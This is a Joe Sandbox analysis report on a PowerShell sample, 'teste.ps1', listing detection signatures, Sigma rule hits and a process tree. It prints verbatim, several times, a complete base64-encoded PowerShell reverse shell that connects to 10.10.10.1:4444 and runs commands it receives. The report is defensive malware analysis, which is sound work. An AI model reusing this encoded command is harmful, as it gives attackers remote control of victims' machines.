Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
teste.ps1

Overview

General Information

Sample name:teste.ps1
Analysis ID:1675108
MD5:d43f3078147348d65e6d45b0dd8bb9b6
SHA1:26d97115d6dad035bd6b2b3c14fa56871649e3ce
SHA256:b8f1effbb4aa7ce402352b78e0b8aa1245a1e47cf551ce9f15b8235a1d88cdf8
Tags:ps1user-smica83
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
AI detected malicious Powershell script
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • svchost.exe (PID: 7300 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQA
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQA
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3556, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", ProcessId: 7928, ProcessName: powershell.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQA
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3556, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", ProcessId: 7928, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7300, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • AV Detection
  • Phishing
  • Compliance
  • Spreading
  • Networking
  • E-Banking Fraud
  • System Summary
  • Data Obfuscation
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • Anti Debugging
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleNeural Call Log Analysis: 92.5%

Phishing

barindex
Source: teste.ps1Joe Sandbox AI: Found malicious Powershell script: High-risk reverse shell script with multiple malicious indicators: Base64 obfuscation of entire script, dynamic code execution (IEX), network connection to suspicious IP (10.10.10.1:4444), character manipulation to hide strings, uses System.Net.Sockets for raw TCP connection, and establishes interactive command shell. Classic command & control (C2) behavior.
Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.1374203986.00000000079B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb9; source: powershell.exe, 00000002.00000002.1369870772.000000000361F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.1369870772.000000000361F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.pdb? source: powershell.exe, 00000002.00000002.1374203986.00000000079B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5&:HnG source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000003.00000002.2364387027.0000017795C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1203181729.0000017795B68000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
